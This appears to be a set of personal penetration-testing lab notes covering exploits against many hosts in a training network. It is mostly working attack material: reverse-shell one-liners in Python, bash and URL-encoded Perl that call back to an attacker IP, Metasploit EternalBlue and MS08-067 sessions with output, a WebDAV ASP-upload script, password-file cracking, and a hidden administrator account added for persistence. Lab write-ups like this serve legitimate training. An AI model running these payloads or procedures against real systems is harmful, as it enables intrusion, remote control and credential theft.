Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' | windows/remote/643.c
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' | windows/remote/646.c
--------------------------------------------- ----------------------------------
locate (path to the exploit, example windows/remote/16399.rb)
/usr/share/exploitdb/platforms/windows/remote/16399.rb
vi (nano??) the exploit's path (example see the above line)
pdf attack
client side attack using PDF
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.81
exploit
sendemail -t pedro@thinc.local -f jeff@thinc.local -s 10.11.1.229 -u Report -a report.pdf
migrate quick to an NT process
if you migrate into a NT /SYSTEM
curl
curl as a search engine against robots.txt
otrs 5 free website
^^^^
root@localhost
....
https://www.exploit-db.com/exploits/43853/
#########################################
1. Authenticate to an agent account. <path>/index.pl
2. Open "Admin" tab. <path>/index.pl?Action=Admin
3. Open "SysConfig" link. <path>/index.pl?Action=AdminSysConfig
4. Find the "Crypt:PGP" subgroup. <path>/index.pl?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt%3A%3APGP;SysConfigGroup=Framework
5. Manipulate form parameters and use "Update" button to save:
"PGP"
-Default: No
-New: Yes
"PGP::Bin"
-Default: /usr/bin/gpg
-New: <shell command including executables the webserver user has execute permissions for, no options>
-PoC (Reverse Python Shell): /usr/bin/python
"PGP::Options"
-Default: --homedir /opt/otrs/.gnupg/ --batch --no-tty --yes
-New: <any command options>
-PoC (Reverse Python Shell): -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.81",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
6. Open "Admin" tab. <path>/index.pl?Action=Admin
7. Open "PGP Keys" to execute saved command. <path>/index.pl?Action=AdminPGP
Behavior will vary based on commands. The above PoC opened a stable, no TTY, reverse shell under the "apache" user. The page eventually timed out with a 502 error, but the web application seems otherwise unaffected. Killing the shell before timeout advances the web application to the proper "PGP Management" page. The exploit can be repeated unlimited times with step #7 above.
follow the instructions above from the exploit
pentest monkey python reverse shell one liner hackon coffee provides the one liner reverse shell
##############################################
this gets a user shell
privesc:
pass the target linuxprivchecker.py
and run it
you see that passwd is world writable so....
edit the passwd remove the x from root
example 2
ms08_067_netapi
what was keyed on to find an exploit?
| Public Options: PUT, POST, COPY, MOVE
See if you can just get right in using Cadaver (why??????????????????????????)
command:
cadaver http://10.11.1.229
dav:/> ls
Listing collection `/': succeeded.
Coll: _private 0 Feb 18 2008
Coll: _vti_cnf 0 Feb 18 2008
Coll: _vti_log 0 Feb 18 2008
Coll: _vti_pvt 0 Feb 18 2008
Coll: _vti_script 0 Feb 18 2008
Coll: _vti_txt 0 Feb 18 2008
Coll: aspnet_client 0 Feb 18 2008
Coll: images
- make a sample file aaaa.txt
dav:/> put aaaa.txt
Uploading aaaa.txt to `/aaaa.txt':
Progress: [=============================>] 100.0% of 9 bytes succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: _private 0 Feb 18 2008
Coll: _vti_cnf 0 Feb 18 2008
Coll: _vti_log 0 Feb 18 2008
Coll: _vti_pvt 0 Feb 18 2008
Coll: _vti_script 0 Feb 18 2008
Coll: _vti_txt 0 Feb 18 2008
Coll: aspnet_client 0 Feb 18 2008
Coll: images 0 Feb 18 2008
aaaa.txt 9 Feb 8 09:33
- make an exploit file using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.11.0.81 lport=4444 -f asp > bbb.txt
- upload that file
dav:/> put bbb.txt
Uploading bbb.txt to `/bbb.txt':
Progress: [=============================>] 100.0% of 38664 bytes succeeded.
- make target think the .txt is an .asp
dav:/> move bbb.txt bbb.asp
- set up an LP in kali:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.0.81
msf exploit(handler) > exploit
- bring up browser
http://10.11.1.229/bbb.asp;.txt
- background that connection.
example 3
nmap -A 10.11.1.72
nmap -p- -sT 10.11.1.72 <=====full port scan
port 4555 JAMES admin portal
dirbuster (uncheck be recursive, medium list)
telnet into 4555
google default creds
root
root
set passwords of all users to their name????????
telnet port 110
pop3 commands
USER ryuu
PASS
LIST
RETR ######
log into ssh ryuu using password from email
escape from restricted linux shells <==none work
grab that python script that makes the /../../../......
change payload of python script to:
bash -i >& /dev/tcp/<IP address>/<port> 0>&1 <=====reverse shell cheat sheet
set up a listener
python script IP
then log in as ryuu
PATH=/bin:/usr/bin
echo $0 to see what shell you are in
need to be in a tty shell to have full interaction with the box
some sort of pty python command....pty.spawn NETSEC
cd /dev/shm
linuxprivchecker.py??????????? (put in on a simplehttpserver thing and use wget from the target computer)
gcc 18411.c -o exploit
proof file and ifconfig screenshot???????????????????????????
more examples
webmin webapp lfi
40 - /..%01 from some script......he manually pulled the stuff from a script in the searchsploit
etc/passwd
/root/proof.txt
/etc/shadow
perl 2017.pl *********
unshadow:
to mash the passwd and shadow together
the output file can be brute forced against rockyou
use the output to SSH into the system
bob BUGZBUNNY or something
alice location1
/usr/share/webshells/perl/....
make a script
set up a webserver to move the script over
wget http://10......80/script_file
run it in the webserver with the 40 %01's
http://10.11.1.141:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/script.pl
http://10.11.1.141:10000/file/show.cgi/bin/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/tmp/script.pl
############################################
exploit/linux/ftp/proftp_telnet_iac
msf > use exploit/linux/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > options
msf exploit(proftp_telnet_iac) > set rhost 10.11.1.146
rhost => 10.11.1.146
msf exploit(proftp_telnet_iac) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(proftp_telnet_iac) > show payloads
msf exploit(proftp_telnet_iac) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(proftp_telnet_iac) > options
msf exploit(proftp_telnet_iac) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.146:21 - Automatically detecting the target...
[*] 10.11.1.146:21 - FTP Banner: 220 ProFTPD 1.3.3a Server (File Server) [::ffff:10.11.1.146]
[*] 10.11.1.146:21 - Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
[*] Sending stage (826872 bytes) to 10.11.1.146
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.146:47775) at 2018-02-06 15:11:51 -0500
meterpreter >
##########################################
msf > use exploit/windows/http/oracle9i_xdb_pass
msf exploit(oracle9i_xdb_pass) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(oracle9i_xdb_pass) > set rhost 10.11.1.202
rhost => 10.11.1.202
msf exploit(oracle9i_xdb_pass) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(oracle9i_xdb_pass) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.202:8080 - Trying target Oracle 9.2.0.1 Universal...
[*] Sending stage (179267 bytes) to 10.11.1.202
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.202:1163) at 2018-02-12 16:15:46 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
####################################
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.81 LPORT=4444 -f war -o shell_rev_4444.war
Payload size: 1083 bytes
Final size of war file: 1083 bytes
Saved as: shell_rev_4444.war
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
10.11.1.209: inverse host lookup failed: Unknown host
connect to [10.11.0.81] from (UNKNOWN) [10.11.1.209] 32794
kraken.thinc.local 10.11.1.209
- tomcat
google default creds
google war reverse shell
second link
msfvenom payload---java/jsp_shell_reverse_tcp blah blah blah
nc -lvp 4444
click the shell link in the manager
creates reverse shell
#################################
manager page
tomcat
tomcat
Server Information
Tomcat Version JVM Version JVM Vendor OS Name OS Version OS Architecture
Apache Tomcat/5.5.35 1.6.0_37-b06 Sun Microsystems Inc. SunOS 5.10 x86
Applications
Path Display Name Running Sessions Commands
/ Welcome to Tomcat true 0 Start Stop Reload Undeploy
/admin Tomcat Administration Application true 1 Start Stop Reload Undeploy
/agent true 0 Start Stop Reload Undeploy
/balancer Tomcat Simple Load Balancer Example App true 0 Start Stop Reload Undeploy
/host-manager Tomcat Manager Application true 0 Start Stop Reload Undeploy
/jsp-examples JSP 2.0 Examples true 0 Start Stop Reload Undeploy
/manager Tomcat Manager Application true 0 Start Stop Reload Undeploy
/riFrOgsRJyktlG8m6LfqOyFCHa9P true 0 Start Stop Reload Undeploy
/servlets-examples Servlet 2.4 Examples true 0 Start Stop Reload Undeploy
/tomcat-docs Tomcat Documentation true 0 Start Stop Reload Undeploy
/webdav Webdav Content Management true 0 Start Stop Reload Undeploy
/yCoFdaeoG7hKKO7yZeimqkf true 0 Start Stop Reload Undeploy
msfvenom -p solaris/x86/shell_reverse_tcp LHOST=10.11.0.81 LPORT=4444 -platform solaris -f war -o 4444.war FAILED FAILED
############################
##############################################
https://10.11.1.217/index.php
admin
admin
https://www.exploit-db.com/exploits/18650/
https://10.11.1.217/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.11.0.81%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
connect to [10.11.0.81] from (UNKNOWN) [10.11.1.217] 56062
id
uid=100(asterisk) gid=101(asterisk)
sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
########################
exploit/windows/smb/ms17_010_eternalblue
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > set rhost 10.11.1.220
rhost => 10.11.1.220
msf exploit(ms17_010_eternalblue) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > options
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.220:445 - Connecting to target for exploitation.
[+] 10.11.1.220:445 - Connection established for exploitation.
[+] 10.11.1.220:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.11.1.220:445 - CORE raw buffer dump (51 bytes)
[*] 10.11.1.220:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.11.1.220:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 10.11.1.220:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 10.11.1.220:445 - 0x00000030 6b 20 31 k 1
[+] 10.11.1.220:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.11.1.220:445 - Trying exploit with 12 Groom Allocations.
[*] 10.11.1.220:445 - Sending all but last fragment of exploit packet
[*] 10.11.1.220:445 - Starting non-paged pool grooming
[+] 10.11.1.220:445 - Sending SMBv2 buffers
[+] 10.11.1.220:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.11.1.220:445 - Sending final SMBv2 buffers.
[*] 10.11.1.220:445 - Sending last fragment of exploit packet!
[*] 10.11.1.220:445 - Receiving response from exploit packet
[+] 10.11.1.220:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.11.1.220:445 - Sending egg to corrupted connection.
[*] 10.11.1.220:445 - Triggering free of corrupted buffer.
[*] Sending stage (205379 bytes) to 10.11.1.220
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.220:49226) at 2018-02-06 14:07:43 -0500
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.11.1.220:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
###############################################
ms08-067 - exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > set rhost 10.11.1.227
rhost => 10.11.1.227
msf exploit(ms08_067_netapi) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.227:445 - Automatically detecting the target...
[*] 10.11.1.227:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] 10.11.1.227:445 - Selected Target: Windows 2000 Universal
[*] 10.11.1.227:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.11.1.227
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.227:4905) at 2018-02-06 13:06:12 -0500
###################################################################
mimikatz attempt (post/windows/gather/credentials/sso):
use post/windows/gather/credentials/sso
options
set session 1
- session 1 is the meterpreter session opened by ms08_067 above
run
##################################################################
10.11.1.229 (ends with exploit/windows/smb/ms08_067_netapi, run through a port forward; see below)
what was keyed on to find an exploit? this line from the nmap script output:
| Public Options: PUT, POST, COPY, MOVE
- PUT and MOVE advertised on the web root means WebDAV with write access: anyone can upload a file and rename it
See if you can just get right in using cadaver (a command-line WebDAV client):
command:
cadaver http://10.11.1.229
dav:/>ls
Listing collection `/': succeeded.
Coll: _private 0 Feb 18 2008
Coll: _vti_cnf 0 Feb 18 2008
Coll: _vti_log 0 Feb 18 2008
Coll: _vti_pvt 0 Feb 18 2008
Coll: _vti_script 0 Feb 18 2008
Coll: _vti_txt 0 Feb 18 2008
Coll: aspnet_client 0 Feb 18 2008
Coll: images
- make a sample file aaaa.txt and upload it to confirm PUT really works:
dav:/> put aaaa.txt
Uploading aaaa.txt to `/aaaa.txt':
Progress: [=============================>] 100.0% of 9 bytes succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: _private 0 Feb 18 2008
Coll: _vti_cnf 0 Feb 18 2008
Coll: _vti_log 0 Feb 18 2008
Coll: _vti_pvt 0 Feb 18 2008
Coll: _vti_script 0 Feb 18 2008
Coll: _vti_txt 0 Feb 18 2008
Coll: aspnet_client 0 Feb 18 2008
Coll: images 0 Feb 18 2008
aaaa.txt 9 Feb 8 09:33
- make an ASP reverse-shell payload with msfvenom (calls back to 10.11.0.81:4444); upload it as .txt first:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.11.0.81 lport=4444 -f asp > bbb.txt
- upload that file
dav:/> put bbb.txt
Uploading bbb.txt to `/bbb.txt':
Progress: [=============================>] 100.0% of 38664 bytes succeeded.
- rename it so the server runs it as ASP: IIS 6 stops parsing the file name at ';', so bbb.asp;.txt is executed as bbb.asp even though it still ends in .txt
dav:/> move bbb.txt bbb.asp;.txt
Moving `/bbb.txt' to `/bbb.asp%3b.txt': failed:
http://10.11.1.229/bbb.txt: 401 Unauthorized
- ignore the unauthorized; the renamed file is served in the next step anyway
- set up a listener (multi/handler) in Kali matching the payload's LHOST/LPORT:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.0.81
msf exploit(handler) > exploit
- bring up a browser and request the renamed file; IIS executes it and the reverse shell connects back to the handler
http://10.11.1.229/bbb.asp;.txt
- hit enter
- sessions -i 1 (to interact with that session)
- background that session (it is the pivot for the next step).
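The same OPTIONS / PUT / MOVE sequence the cadaver session above performs by hand, as an added example (not code from the original notes): it parses the methods the server advertises to decide whether WebDAV is writable, uploads a file, then renames it with the IIS 6 `name.asp;.txt` trick. The file names bbb.txt and bbb.asp are the ones used above; the FakeIIS6 class is a constructed stand-in for the lab server so the script runs offline, and the percent-encoded Destination header matches what cadaver sent (`%3b`).

```python
"""Added example: WebDAV write check + upload + IIS 6 semicolon rename."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import quote, unquote, urlsplit

# Methods that let a client change content on the server.
RISKY = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}


def parse_methods(header_value):
    """'PUT, POST, COPY, MOVE' -> {'PUT', 'POST', 'COPY', 'MOVE'}"""
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}


def risky_methods(headers):
    """Risky methods advertised in the Public or Allow header of an OPTIONS reply
    (IIS sends both; the nmap output in the notes shows the Public one)."""
    found = set()
    for name in ("Public", "Allow"):
        value = headers.get(name) or headers.get(name.lower())
        if value:
            found |= parse_methods(value) & RISKY
    return found


def iis6_semicolon_name(script_name, decoy_ext=".txt"):
    """IIS 6 stops parsing the name at ';', so 'bbb.asp;.txt' runs as ASP."""
    return script_name + ";" + decoy_ext


def _request(host, port, method, path, body=None, headers=None):
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    resp.read()
    hdrs = dict(resp.getheaders())
    conn.close()
    return resp.status, hdrs


def stage_upload(host, port, upload_name, script_name, data):
    """OPTIONS -> PUT -> MOVE. Returns (risky methods seen, PUT status,
    MOVE status, final path on the server)."""
    _, opt_headers = _request(host, port, "OPTIONS", "/")
    risky = risky_methods(opt_headers)
    src = "/" + upload_name
    dest = "/" + iis6_semicolon_name(script_name)
    put_status, _ = _request(host, port, "PUT", src, body=data,
                             headers={"Content-Type": "text/plain",
                                      "Content-Length": str(len(data))})
    # cadaver sends Destination percent-encoded ('%3b'); quote() does the same.
    move_status, _ = _request(host, port, "MOVE", src,
                              headers={"Destination": f"http://{host}:{port}{quote(dest)}",
                                       "Overwrite": "T"})
    return risky, put_status, move_status, dest


class FakeIIS6(BaseHTTPRequestHandler):
    """Constructed stand-in for the lab's WebDAV server; keeps files in memory."""
    store = {}

    def log_message(self, *args):  # keep the example quiet
        pass

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Public", "OPTIONS, TRACE, GET, HEAD, POST, PUT, COPY, MOVE")
        self.send_header("Allow", "OPTIONS, TRACE, GET, HEAD, POST, PUT, COPY, MOVE")
        self.end_headers()

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        self.store[self.path] = self.rfile.read(length)
        self.send_response(201)
        self.end_headers()

    def do_MOVE(self):
        dest = unquote(urlsplit(self.headers["Destination"]).path)
        if self.path in self.store:
            self.store[dest] = self.store.pop(self.path)
            self.send_response(201)
        else:
            self.send_response(404)
        self.end_headers()


def start_fake_server():
    srv = HTTPServer(("127.0.0.1", 0), FakeIIS6)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_fake_server()
    host, port = srv.server_address
    print(stage_upload(host, port, "bbb.txt", "bbb.asp", b"<%= 1 %>"))
    srv.shutdown()
```

Against a real host, call stage_upload("10.11.1.229", 80, "bbb.txt", "bbb.asp", open("bbb.txt", "rb").read()) and treat a 401 on the MOVE the way the notes do: check whether the renamed path is served before assuming the rename failed.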
#############################
in meterpreter (the backgrounded session on 10.11.1.229):
portfwd add -l 445 -p 445 -r 10.11.1.229
- this portfwd command listens on Kali's port 445 and relays every connection through the already-running meterpreter session to port 445 on the victim, so a tool pointed at 127.0.0.1:445 reaches the victim's SMB service.
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 127.0.0.1
msf exploit(ms08_067_netapi) > set lport 6666
msf exploit(ms08_067_netapi) > set lhost 10.11.0.81
msf exploit(ms08_067_netapi) > exploit
- this string of commands attacks the Kali box itself (127.0.0.1:445), which the port forward relays to 10.11.1.229:445; the new payload calls back to 10.11.0.81:6666 (lport 6666, because 4444 is still held by the multi/handler session) and returns a second, higher-privileged prompt.
#############################
going to 10.11.1.230 in the browser brings up a login page.
admin / admin worked!! (random guess)
logs into a UPS management page. not very interesting; the page shows:
Description of Alarm Date / Time
UPS Not Connected March 26 2018 at 10:00
Remote Agent Not Connected
Description:
A remote agent you have attached is not communicating.
Recommendations:
1. Stop and restart your agent.
2. If problem continues contact your system administrator.
The remote agent may not shutdown properly if not communicating with manager.
###################################
ATTEMPTED eternalblue against 10.11.1.230:
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               10.11.1.230      yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.   <== also tried false
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.11.0.81       yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
FAIL FAIL FAIL - kills the computer..... (the target crashes rather than returning a session)
- a failed kernel pool groom is a BSOD, not a clean miss; do not keep retrying this module against a host that has to stay up
################################
msf > use exploit/windows/http/hp_power_manager_filename
msf exploit(hp_power_manager_filename) > options
Module options (exploit/windows/http/hp_power_manager_filename):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP3 / Win Server 2003 SP0
msf exploit(hp_power_manager_filename) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hp_power_manager_filename) > options
Module options (exploit/windows/http/hp_power_manager_filename):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP3 / Win Server 2003 SP0
msf exploit(hp_power_manager_filename) > set rhost 10.11.1.230
rhost => 10.11.1.230
msf exploit(hp_power_manager_filename) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(hp_power_manager_filename) > options
Module options (exploit/windows/http/hp_power_manager_filename):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    10.11.1.230      yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.11.0.81       yes       The listen address
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows XP SP3 / Win Server 2003 SP0
msf exploit(hp_power_manager_filename) > exploit
##########################################
from the resulting shell, add a local admin account so you can get back in without re-running the exploit:
C:\Windows\system32>net user hacker P@ssword1234 /add
net user hacker P@ssword1234 /add
The command completed successfully.
C:\Windows\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\Windows\system32>exit
#######################################
if you have ports 445 and 139 - check for known SMB bugs without running the exploits:
- nmap -p 139,445 --script smb-vuln* ip.addy
- the smb-vuln-* scripts cover ms08-067, ms17-010 and friends; smb-vuln-ms08-067's own description warns it may crash the target, so read the script before running it on a box you need up
if you have port 80:
- fire up the web browser
- fire up dirb or dirbuster, etc
- google default creds (admin/admin got into the UPS page above)
- search for an exploit for whatever the server software and version is
searchsploit
- -t searches only the title
- -x <path> (the path from the search results) shows the exploit's contents right there; -m <path> copies it to the current directory
##########################
and now the manual route:
10099.py (Exploit-DB), still dealing with the HP Power Manager software
- check the hardcoded addresses in the python code against the target and modify them if they are wrong
- generate the payload with msfvenom (the script ships its own shellcode; swap in one that calls back to your listener)
- set up a listener: multi/handler with the matching payload, LHOST and LPORT
python 10099.py ip.addy